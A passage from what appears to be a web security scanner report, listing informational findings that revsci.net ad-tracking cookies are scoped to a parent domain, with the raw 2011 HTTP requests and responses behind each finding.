HC0h5tpMEm6W7+erhn93u1cBSkOvDoCr0GepDjUWA/1yQzlErEbvPIyhM3f4Jzt8JEyA2ePwz5BrQAUT9/dLtw8tewKVOKqP/qq9iEZ0wmdXyjf/AVeIc8f2yvlCzvSY+nfgoZk3nuvpBn+TM//Se4rR/DBpuCUDXQuA7A6XXEa7vK0oRNNNeyJKHti3Q1fiLowLkcct3KanqtvmCIU6n0kuFI6nT1Ahq/vOxwTNJbEJOQVxP2vHai7ZVs1Qa6BwHlMkcXR6E6DXWn7nbH651+v741MwSOh0TCFMQTTNGUekw4gX6f9HtRzUy5C/ACJ4xJ7a+tKlQGoDR42VY9foLr0PtTN/oCK3ykMmboo7thtABUtmg"; rsi_us_1000000="pUMV4ymjOCYULQEE166YFQ6DmFfDqOqv5R0Sep/xDdMQzQnGPlweaJXw308lcxsF58vOxVNcs8R89Us/bQw/0uEcBlgm3HbVBaqZciMXxA7ZQVsQNiAf++dJGYq1/xNl73YlZqAJtiAniZK+6WJ9mDbp1ivhzL5nEis7wXnPalOc+X8R2RVg+y8UNaZy5ZOc+H8kd4SG3Oo03tz7/dw18dKTWdxukwoaubmDFQHTMm4sRKbDfKN48UPoYMTs6BX1A4LF46V440ElFpoeJitf2h/pLwbuK0ljGz39v62Sma+Zo73lcvqhSmbjkU1Q6kZQoclEYeUyfIqfQY3sCsUUa8Sy9z7ZcgnF1atSKLPhTXaf6OoqzQEfeQWe3wpIUGn2GHtXLVGm45mmFmqunA7jZO2aHzuLCTp28NqBu8kCH+xHOE6jb7/4z7ZPkQJ+u/D+sZL25ZZoIAnJ4uU+LqTXIUpslqyUB5oWsUbJLKSoK89sf5wC46cWKHLCUCUx7V+Vn5AoBfDmY0qerCSkq63sxMnKVc7Y2mLTInWjV/ewZU9UjHPMkHGBtTX8t75ArQil/Na2GRTFUr5fhdfgzx5oueUv1FPRvGVMAAqoGtR13qVB/Vg2keSh/FCyLjGc7uE/9s+WRiFezbsVZeCcC+d9Eb880BuvdonWkyFfw1avjO6jM5wSjPV0ATxo8i0yFWFbNJIhhHcqIHXKggZNdINPohBJjEC1kJGLwFSXfTmEkpyH3TofsHIdXiJBg8muA/Jaj3c2fgkIteiYcB2Gz4Wn7j5HgmfS2ecJe+Trq7ITr9gPIZRpsJSIaO3EOUuYIwjyNdvXn8MfyMoxNDKjRes+Q8bR2sJdjoX8lZOkDh5J3PsAg0ikelhbA+xEPpzCrSjQCR2VevyKfKb/K0DBlXBwCdBzJqyGXNGQSDeXGHOCnhhj57KZMNSbLbSuOz5S21Yml1cbecDFyQsykG1JkFEr1ZDlBPWhf0lFBV6XAFRVrJ/a/JXiiBb4Eeg0AJ8vdp9Ilk5Na13QOPb71fp0boUamxNQpFz2NH9rpR1TOzhJz32LBycYZQry+MdshyoyJQ15G5TxeWDaczW4lSsMVYpvvQzqS8vRkGLOgMshXUu2E+a6xgsVGc11kHB8/aLJkwXFkcx4BF0L4s4ICThTh7CcKzozKJmM4LzFXXaINqTogC3wV5sXvBwSQfSVUd9lpwd9bs34Cb1OEjgd7rqkmnwwqP5uXurOGd8EYTeaGuv/qZPb8bTTalHpXy+PkGYZX13lAxeMItepWLPcaLLBpAYBKZ/Ihq1fKdq4TQe38T7YgQh+wnvRH1fjYGJmt5DWwZOw3wbIad2fJZShuZWCNnyIB6KCbPN4G/KTzUNy5kVqO+pBsdZW05zyp5FIuP0vYNGbMBkdNgMWUed6K/hEUdmSGEyP19JTJtDeHAag63fQkEjJ6twXzWTr1I7NaNzc+vCaGz5HPRVZafnlO/ulNenk6eGxbU9msVlICW6Fsoac7neLMtXq3KnjAoQSzlc37GR17Uli9FXO/9DpV+1KMKVSzhTj7dEU13glsLz96Zewco5QSNCjx3VKQ82gqES+uLicq8VrbcQZ8bZUFsiEyYTxlZ+fS6/EYnLjJ9Bk6LAgUDFoLFqGEFdxm9qf31Gqq6yE+3FP0sXUhv9CTG9Qao3c6D69SN73qQ3I+LREv/fxXOnYd5NAs+zwVcmF/PHUAgKmZMsxjhKOlt4kOsS+FetbxfaCgkZcpZ4P36eyny+I4yUu0lDINI8+eBDvAUCY3h2n89Pz1nhuWK7Q534Q7w=="; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4k+huAIMDjaxq2F29zEFqICTC+braGYRkX2Il9r5vw/ZUticb4lLatz2X2BRF3fuzSPpZHOhG8XBQJfzC6mHn5XL+5kMRn9Ej7OPPmzGcTLoQGAD4+mlCyw1VhsIgll0dVU7YgbLvf8jP1IAILKHv23plY3OGVUE6uU/k+/C+AHqJ6wZiw8k46VH4BT+8uwHZkdQtE8myAf7GVM69Spx0dJcewAfqbKmBErgZkMdZIO2YF8wnql8uSbs9XQw0uX3nKfQiSxKkHxJ04tuIVx23LkAyHsHMOF1n1T3fhVDshqIz11T1HIDcLHifRzjDbE6zPbM9zhvCtMVF4HZq8C6baoCcmA1q7I95TBWbtuLtQPHaeCYXIN6Q7txYlaQjwhiDvS4EBmELnR00viV9oQ444/ReZVLMRAV+4PZ3cYF3Nutp5PB9qngd0j+C+BltI5/cFF9zNKulRKud0IqiVqx2Vp9Wd74f1lqgKTGmwunkCcqQ3ptnvhDtC3C9OTmwCwSBNoPv9CrVHez8Ov6JRj+LzZ7dC5oX4G0cCDrWBtS/E0aWeJ6tQsgbLCR9NRAqyp75UFEhmQv5LsJQzZJeJotrMQAPO7n2Z52+HG6V4oh023SjwmizJg93D/Su6XKvycukTb85FlHDTu8ZAwVinPuFgg3ptnufQf4xFMRCoYkuxN7/tlspKuDX9FDyNd7G7HzZXDNyghGWNaDjy8ySqQktLXsLK5jQSAqnD4NoVOUsYG/YNBg5q6NYeu27UcHj350kKnxqk+PNXXtn+43MR2Z4gbWfXY=; rtc_eanp=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_eanp=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4k+huXIQJ/AtY6gq+ml3T51epqLBQmL8IGbY2gQ4O3XYKvnesHJskvAjloepK631i+WEhWmrGkG9POozi7inp/3S9t0/IkxBMjdPeK2r1xOnBR+A8KgmFzpR3pMg5V0STXRc5h/sA2NQ8SJlLg63pEKsg0I5wRad6dbI4VuGWq0qyRY6oFRDcRF2ywDPp/l2ZM/I/17S1FdjMhMyzTpwiyFgMBvjzji/YDIpZH9+iRia02zqup5Uc4RB7fdpzSNwFedZ7rF5pmLypIrhS6jTxXdihxtKUvnVp3q4CZDvvMwKRSQUBIW8aKH6yqDjLLFCxPSykE7ev85UXsanukFhZ9jYJjEs313/TmtNJZjZKdkEwlKP+EpScAuabJwc2MVWU5pKqCBEiB/oMmqVrjImbeGElhPS91RP79kBRGAMI3fkhrHTOrUB9Nj+DoZKH4lbg3Y3J9fn8ovUmELM6+fTLDZn64dD6QhCAEzHeyhtNq/gwTK3++V4LRJN+nSAfcUw3lASsUZNnfJXTu8Q6bEhNzGSJQRi7/mcA+9ehrTH4KDTZbkJv7PT4yxIEMkCSgxLn6HSWeEolJQXExDVPWrP/cJ3hVepclllkb9wBj0AY1yZEwqutB2h4qxbtUMBqUHh6OSHAx9XJ2YkwMZHL/CCmBi2npcpOJ+5/TUDcglD1Y7oRv43ayXSghpU5rlQGkOeKu+yDGQAXXWVB4yBSqHOppm9zCE0PdS2yri1Rj97MbjhcH+2CxSiFDOCK/fCv/8tlGv96HYrlNfrIVhi5C6uRanp26QbkxI=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/
Set-Cookie: rtc_1ITi=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:15:54 GMT
Content-Length: 1089

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','D08734_72078','H07707_11017','H07707_11018','H07707_11028','H07707_11029','
...[SNIP]...

13.73. http://pix04.revsci.net/H07707/b3/0/3/0806180/949356899.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/949356899.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPNOE/FLnIQlrWdI00WdC2M5e+iH53YApI1XQ1VhIIo+uLeylJ24IzIDUVJoi+vnOqW9W/ZJZlixYxplxRO0W1JvkWpOEh6HITQG7wwtuWBy03DV2z/vqwD6stqsWyVtod2+y613Cs++rbRUfxEWWduyC6rDKAMyfYjERD/tzztSnr+CAtqaB92apUcZdvwPRCFqDZWn9No0zlL4k/buv/yOKhRX9tiffPrBsrIQ/ZRWwIlm22f8I7/9F5nFFM=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:19 GMT; Path=/
rtc_66oE=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Err//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCC+G/59; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:19 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/949356899.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F06%252Fpalantir-valued-at-2-5-billion-or-more%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fventure-capital%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/06/palantir-valued-at-2-5-billion-or-more/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=MLvv7qPvYS5npS5IdtJQSJvhPx/j4C3JXuteOzZrowSCWmqpgTbMk8TbSMyqxlmLyxECNpR02+gPiezqOi+5yDykHuJcd6JJdoqLT8+i34bQnPvlwJigh1mUBVMxT2jfIxNwiDsUjsIFhNY13veukem47waFuIaQqYRyamjEvbzrtYAFMkMLhz8IyAfDJDgGAxRmbCiIOI/di7VuccpOkCFmEfIjhk5PRY/BVcGMxjjd26Gh4r3LbiC/DDBiBEkhq8JEqKIFkLwkhRrrOal9LlyDJN56E1oZkKstcU4ls+6wuVbuB+4+40PT0qOQ8ovh6fTDhw1dZ5SWaGL6x6vGDshNHJvL1UajC5eKoBIJ2xSFpyDcj4+w77js62NAT7kEPYmvqQoshwPyf2vOCimLsUgUFNNxIGmZPYzZs4PiPM+vVu1dcss0McJQrn3DO1uknbOYHQiwl9wlvyRQm0rbkjW9LIrwSiZCNdEo0ad0FuCYBgpXiDG66lxpMUq0lKVhL3YyhyI/Oj+MuDOYFK+dW/6zM7b1mda0br2f4dGKPL3vg4qXPKYWMdCSKP0Xg355P74y; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPFOEPB7nMME594u+yjy0mav02iTsILcFItXRgoUTnlu1I0fvTx4Uzo/UWd5q+nTGoaNabDNSBKewcX6S7TBaIk6jd0+MBxvnAK9JboqoHpyEHF6wY/rKVe6EvTibweFOyKXr44rf06GLp3ZYgcvJ9ta/eFouLHU1W2bIozA/yq0E4w9CipCXek7DYBMQmdgvtLtf1geEgQccYWFr/z3xFYnvfSb3B3EUgPFJE5QVeopqyarGbY9Q==; rtc_GomL=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E3r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCF5Z/4S

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_GomL=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNOE/FLnIQlrWdI00WdC2M5e+iH53YApI1XQ1VhIIo+uLeylJ24IzIDUVJoi+vnOqW9W/ZJZlixYxplxRO0W1JvkWpOEh6HITQG7wwtuWBy03DV2z/vqwD6stqsWyVtod2+y613Cs++rbRUfxEWWduyC6rDKAMyfYjERD/tzztSnr+CAtqaB92apUcZdvwPRCFqDZWn9No0zlL4k/buv/yOKhRX9tiffPrBsrIQ/ZRWwIlm22f8I7/9F5nFFM=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:19 GMT; Path=/
Set-Cookie: rtc_66oE=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Err//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCC+G/59; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:19 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:28:19 GMT
Content-Length: 1119

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_10872','H07707_10950','H07707_10954','H07707_10987','H07707_11017','H07707_11018','H07707_10678','
...[SNIP]...

13.74. http://pix04.revsci.net/H07707/b3/0/3/0806180/955065746.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/955065746.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4kmheQIMDjaxY4NY56qG7poa4ScLEaatLDiorNn5vw/ZUtic7CPZq60bIzTlnSCIjQNpmQyiPpn1WLZYGIVHHqRL8VuyK4KTktWpKfhIdHIBwclAI+6iD3yXxATNyXVdCP9qr5pUf86eVqDRYrXnrWOQjJGgQmy7sH3W0QYN9ncBmAi6AFeBtqgO+BHtTmqf+IwWdMW+vn20BWfxvnJZS8x1vTAmlPu7yTn9sxzlDvQISj2WEjZNX5rXV5ukaTRHGuM2yeuQT4RICgZT5x2mDJvn8tq9GJ7UH/gE6iPm5BKu3WqKlqylGDQsXLxPXLrxUvqZgL/GXlsGJHcV2yLjheFx52zg/AdJWYX0xIqaWFDAinkd+HFgH/FBcPcf5PGHkf42QFcsCVqWq77hxoYmwYkrpfC7Hs8gZrse1DI9+qNwbwtyVVHII0+JZJa1OaEzmF6Zw8e7llMjMyCkhULZ21J9kYowe2hqB6T83cVhkCcqx3pt3vCz1JWV+51wLTq7ZHPu9iPjPSzpK3S+ft1SGY1b15QeMEL8FbeKr45VXaZhA4iyTvuoNgHNfM4RL0j14Zwe6y/gSeW4/l5ymzNyQzM12yygrhnseP7s6I4K6us+leNumjaJC9k3cVu4QDEHOzhNyKcgXRPKR6gAcB3t2p1c8fRmMC21jut4cMEEvTt3lVnG2tZCeaSekeLOhtKQ80CKe8cDI/Itmn0obtX7sv8Dvtv6ozqmfUmuDvrZQehyH8PrPZJ1UY7KtrppAQs+iQ3T5Va0el3exUNrNzcBtjOoKtqoeUJlY123acnt3TP1StLZgYrwdJ1I; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:06 GMT; Path=/
rtc_u0Bh=MLvv+TUxJohm57br/FOrg2mN7irC3DjP1ChBHkkDb2IH8Z6qLwZuWqGjy/Xuyg8v3sLBnXh6nihFPfp5QX5po+dN7bkhx0QKD/5YN7WzJvEDzwSyPz62Cul+KglQgrX5vPPAe1CK28tHuk74SxbuB/5g6RILMlAqYeIB0b2WQ2t28icY+SrSW/6Kzkes3pUyJBJi3gt1fxDymPsZXtPKBYKayaDMoE+LgxBJ/Z3oV8cJo6xGzO9MLZzrsI+PM2wT9lcWsIQeqULwQ3sZ26fAMT8TUCTApzuN6ZfsvZBUX4Bn/9Nttluzu8pI+x201/iywameeIYU+xIwlOP44MexBIqTFjZxYkFnT6r/d1xrzVq8hABxsk6HQLKkVQ/hufkg0OV12sNiozq3QmmpdvMOeaz9oYijP8Jqz9sVES6wIJrY912WZUq86mAotiqSp7Aip5Di4j5G1EPb1WYFoJ75Mn1juc21COMuyJ1PAOrNoYcVp62fXYeuSrC5/wvdhnnl2ikfBv/Q8Mlhgc2B+mf8H3iYB0pOJeuoERtZrxEVSqGJNpqZHfSiX+/P6eWdV8VVrbqa07+7Re8BjtCkk3J++p8aWiZ5tmvfMTlGdi0tBBnd++BjGRuXe5gf44V3TFnjLg6CEA+ItNtFpPoN+VTrtekt7fWHiv9qZxRUrY3oWjLEDhrNcvxHqtM7ajrkbGmSSDnOnwEw5CTl5P34hl7zLs6myZ89x4lRsUJjk+cus7GKc2W1iQtJmLku/F7YmQVRJD3bBY5KH8QMlQKaAnyi9CuofxqdgpmMPSjiQhKouroR+/5UPL+Mv5z+NaIRq0wVq923bzwc3TVwQQI36BpdIH+tXXF/s54FuB7KkQXXismKvJY0